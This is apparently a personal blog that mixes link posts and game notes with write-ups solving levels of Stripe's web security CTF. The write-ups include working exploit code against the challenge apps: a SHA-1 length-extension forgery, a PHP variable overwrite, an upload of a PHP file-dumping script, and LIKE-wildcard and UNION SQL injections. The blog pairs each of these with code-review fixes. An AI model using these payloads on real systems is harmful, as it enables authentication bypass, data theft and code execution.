A DEFCON talk, “The Secret Life of SIM Cards”, that covers running apps on your SIM card. Surprisingly, they run a subset of Java and execute semi-independently of the phone’s OS.
Guardian - Secrets, lies and Snowden’s email: why I was forced to shut down Lavabit
"For the first time, the founder of an encrypted email startup that was supposed to insure privacy for all reveals how the FBI and the US legal system made sure we don’t have the right to much privacy in the first place"
Level 7 of the Stripe CTF involved running a length extension attack on the level 7 server's custom crypto code.
@app.route('/logs/<id>')
@require_authentication
def logs(id):
    rows = get_logs(id)
    return render_template('logs.html', logs=rows)
...
def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])
    h = hashlib.sha1()
    h.update(secret + raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True
The level 7 web app is a web API in which clients submit signed RESTful requests, and some actions are restricted to particular clients. The goal is to view the response to one of the restricted actions. The first issue is that there is a logs path that displays a user's previous requests, and although it requires the client to be authenticated, it doesn't restrict the logs you view to the user you are authenticated as. So you can manually change the number in '/logs/[#]' to '/logs/1' to view the logs of user ID 1, who is allowed to make restricted requests. The app can also be exploited with replay attacks, but you won't find in the logs any of the restricted requests we need for our goal, and we can't simply modify a logged request because requests are signed.
However, requests are signed using the server's own custom signing code, which can be exploited by a length extension attack. All Merkle–Damgård hash algorithms (which include MD5, SHA-1, and SHA-2) have the property that if you have the hash of (secret + data), where data is known and the length but not the content of secret is known, you can construct the hash for a new message (secret + data + padding + newdata), where newdata is whatever you like and padding is the padding the hash function would have appended to (secret + data), determined by their combined length. You can find a sha-padding.py script on the VNSecurity blog that will tell you the new hash and padding per the above. With that I produced my new restricted request based on another user's previous request. The original request was the following.
count=10&lat=37.351&user_id=1&long=%2D119.827&waffle=eggo|sig:8dbd9dfa60ef3964b1ee0785a68760af8658048c
The new request with padding and my new content was the following.
count=10&lat=37.351&user_id=1&long=%2D119.827&waffle=eggo%80%02%28&waffle=liege|sig:8dbd9dfa60ef3964b1ee0785a68760af8658048c
My new data in the new request is able to overwrite the waffle parameter because their parser fills parameters into a map without checking whether the parameter existed previously.
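To make the glue padding concrete, here is a minimal sketch (not the sha-padding.py script I actually used) of how it can be computed. The secret length is an assumption; in practice you might try a range of lengths until the server accepts the signature (12 happens to be consistent with the %02%28 length bytes visible in the forged request above: 0x228 = 552 bits = 69 bytes = 57 bytes of parameters + 12 bytes of secret). The forged signature itself still has to be computed by resuming SHA-1 from the original digest, which sha-padding.py or any SHA-1 implementation that accepts an initial state can do.

import urllib.parse

SECRET_LEN = 12  # assumed length of the user's secret token; try other lengths if unknown

def sha1_padding(message_len):
    # The Merkle-Damgard padding SHA-1 appends to a message of message_len
    # bytes: a 0x80 byte, zero bytes until the length is 56 mod 64, then the
    # original bit length as a 64-bit big-endian integer.
    pad = b"\x80"
    pad += b"\x00" * ((56 - (message_len + 1) % 64) % 64)
    pad += (message_len * 8).to_bytes(8, "big")
    return pad

original = b"count=10&lat=37.351&user_id=1&long=%2D119.827&waffle=eggo"
newdata = b"&waffle=liege"

# The server hashed secret + original, so the glue padding is based on that
# combined length. The forged body replays the original params, then the
# padding SHA-1 would have appended, then the new parameter.
glue = sha1_padding(SECRET_LEN + len(original))
forged_body = original + glue + newdata

# Percent-encoded for readability; the raw bytes are what actually get signed.
print(original.decode() + urllib.parse.quote_from_bytes(glue) + newdata.decode())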
Code review red flags included custom crypto-looking code. However, I am not a crypto expert and it was difficult for me to find the solution to this level.
Levels 1 and 2 of Stripe's web security CTF had missing input validation issues; the solutions are described below.
$filename = 'secret-combination.txt';
extract($_GET);
if (isset($attempt)) {
    $combination = trim(file_get_contents($filename));
    if ($attempt === $combination) {
The issue here is the use of the PHP extract function, which takes an array of name/value pairs and creates corresponding local variables. However, this code passes it $_GET, which contains the name/value pairs from the URI's query string. The expected behavior is to pull out an attempt variable, but since no input validation is done I can also provide a filename variable and overwrite the value of $filename. Supplying a filename that can't be read (an empty string works) makes file_get_contents return false, so $combination ends up as the empty string, which I can match with an empty $attempt. So without knowing the combination I can get past the combination check.
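A minimal sketch of a request that exercises this, assuming the level is served at a hypothetical LEVEL1_URL; the only important part is that the query string supplies both variables:

import urllib.parse
import urllib.request

LEVEL1_URL = "https://level01.example.com/"  # hypothetical URL; substitute the real one

# extract($_GET) will happily create or overwrite $filename as well as $attempt,
# so point $filename at something unreadable and send an empty $attempt.
params = urllib.parse.urlencode({"attempt": "", "filename": ""})
with urllib.request.urlopen(LEVEL1_URL + "?" + params) as resp:
    print(resp.read().decode())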
The code review red flag in this case was the direct use of $_GET with no validation. Instead of calling extract, the developer could read just the attempt value out of $_GET directly.
$dest_dir = "uploads/";
$dest = $dest_dir . basename($_FILES["dispic"]["name"]);
$src = $_FILES["dispic"]["tmp_name"];
if (move_uploaded_file($src, $dest)) {
    $_SESSION["dispic_url"] = $dest;
    chmod($dest, 0644);
    echo "Successfully uploaded your display picture.";
}
This code accepts POST uploads of images but does no validation to ensure the upload isn't an arbitrary file. And even though it uses chmod to ensure the file is not executable, PHP doesn't require a file to be executable in order to run it. Accordingly, one can upload a PHP script and then navigate to that script to run it. My PHP script simply dumped out the contents of the file we're interested in for this level, along the lines of the sketch below.
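A rough sketch of the idea (not my original script): the URLs and the target file path are hypothetical placeholders, and "dispic" is the form field name from the code above.

import requests  # assumes the requests library is available

UPLOAD_URL = "https://level02.example.com/"           # hypothetical
UPLOADS_URL = "https://level02.example.com/uploads/"  # hypothetical

# The payload is a tiny PHP script; once it lands in uploads/, the web
# server will execute it when we request it by URL.
payload = b"<?php echo file_get_contents('../secret-file.txt'); ?>"  # placeholder path

files = {"dispic": ("notanimage.php", payload)}
requests.post(UPLOAD_URL, files=files)

# Now run the uploaded script and read out the secret.
print(requests.get(UPLOADS_URL + "notanimage.php").text)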
Code review red flags include manual file management, chmod, and use of file and filename inputs without any kind of validation. If this code controlled the filename and ensured that the extension was one of a set of image extensions, that would solve this issue. Due to browser MIME sniffing, it's additionally a good idea to serve these uploads with a Content-Type that starts with "image/" to ensure browsers treat them as images and don't sniff for script or HTML.
Levels 0 and 3 of Stripe's web security CTF had SQL injection issues; the solutions are described below.
app.get('/*', function(req, res) {
    var namespace = req.param('namespace');
    if (namespace) {
        var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
        db.all(query, namespace, function(err, secrets) {
There's no input validation on the namespace parameter, and although it is passed to the query as a bound parameter, nothing escapes LIKE wildcards in it. This means you can use the '%' character as the namespace, the wildcard that matches anything, and the query returns every secret.
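A small illustration of why that works, using an in-memory SQLite database as a stand-in for the level's data (the table contents here are made up):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE secrets (key TEXT, secret TEXT)")
conn.executemany("INSERT INTO secrets VALUES (?, ?)", [
    ("alice.password", "hunter2"),  # made-up rows
    ("bob.password", "letmein"),
])

# The level's query: the bound namespace is prepended to the ".%" pattern.
query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"'

print(conn.execute(query, ("alice",)).fetchall())  # only alice's secrets
print(conn.execute(query, ("%",)).fetchall())      # '%.%' matches every key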
The code review red flag was using strings to query the database. Later levels made this harder to exploit by using an API that builds the query from objects rather than strings, by running a query that only returns a single row, by only running a single command, and by not just dumping the query results back to the caller.
@app.route('/login', methods=['POST'])
def login():
    username = flask.request.form.get('username')
    password = flask.request.form.get('password')
    if not username:
        return "Must provide username\n"
    if not password:
        return "Must provide password\n"
    conn = sqlite3.connect(os.path.join(data_dir, 'users.db'))
    cursor = conn.cursor()
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)
    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res
    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)
There's little input validation on username before it is used to construct a SQL query, and no escaping is applied when the query string is built to look up, for a given username, the hashed password and the associated salt. Accordingly, one can make the username part of a SQL command that ensures the original SELECT returns nothing and, via a UNION, provide a new SELECT that returns literal values of our choosing for the hash and salt. For instance, the following is the query template with my injected SQL supplied as the username:
SELECT id, password_hash, salt FROM users WHERE username = 'doesntexist' UNION SELECT id, ('5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8') AS password_hash, ('word') AS salt FROM users WHERE username = 'bob' LIMIT 1
In the above I've supplied my own salt and hash such that my salt ('word') plus my password ('pass') hash to the value I provided. Accordingly, by providing that long and interesting-looking username together with the password 'pass', I can log in as any user.
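A quick sketch of how the literal hash and salt in that username are chosen (the hash is just SHA-256 of password + salt, matching the server's check), and of how the injected username is assembled:

import hashlib

password = "pass"
salt = "word"

# The server computes sha256(password + salt); pick a salt so the
# concatenation is easy to remember, then inject its hash as the literal
# password_hash returned by the UNION SELECT.
literal_hash = hashlib.sha256((password + salt).encode()).hexdigest()
print(literal_hash)  # 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8

# Note the username ends at 'bob with no closing quote: the query template's
# own trailing ' LIMIT 1 closes it, producing the full query shown above.
injected_username = (
    "doesntexist' UNION SELECT id, "
    "('{0}') AS password_hash, ('{1}') AS salt "
    "FROM users WHERE username = 'bob".format(literal_hash, salt)
)
print(injected_username)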
The code review red flag is again using strings to query the database, although this level was made more difficult by using an API that returns only a single row and an execute method that only runs one command. I was forced (as a SQL noob) to learn the syntax of SELECT in order to figure out UNION and how to return my own literal values.
Jet Set Radio HD coming soon with awesome soundtrack promised. Exciting!
“From his first months in office, President Obama secretly ordered increasingly sophisticated attacks on the computer systems that run Iran’s main nuclear enrichment facilities, significantly expanding America’s first sustained use of cyberweapons, according to participants in the program.”
Sarah and I have been enjoying Glitch for a while now. Reviews are usually positive although occasionally biting (but mostly accurate).
I enjoy Glitch as a game of exploration: exploring the game's lands with their hidden and secret rooms, and exploring the game's skills and mechanics. The issue with my enjoyment coming from exploration is that after I've explored all the streets and learned all the skills I've got nothing left to do. But I've found that even then I can have fun writing client-side JavaScript against Glitch's web APIs, making tools for use in Glitch (I work on the Glitch Helperator). And on a semi-regular basis they add new features, reviving my interest in the game itself.
Most existing DRM attempts to only allow the user to access the DRM'ed content with particular applications or with particular credentials, so that if the file is shared it won't be useful to others. A better solution is to encode the user's horrible secrets into a unique version of the DRM'ed content so that the user won't want to share it: entangle the user's and the content provider's secrets, and accordingly their interests, together in one document. I call this Blackmail DRM. For an implementation, it is important to point out that the user's horrible secret doesn't need to be verified as accurate, merely as believable.
Apparently I need to get these blog posts written faster, because only recently I read about Social DRM, which is a lightweight version of my idea with a misleading name. Instead of horrible secrets, they say they'll embed personal information like the user's name in the DRM'ed content. More of my thoughts stolen, and before I even had a chance to think of them first!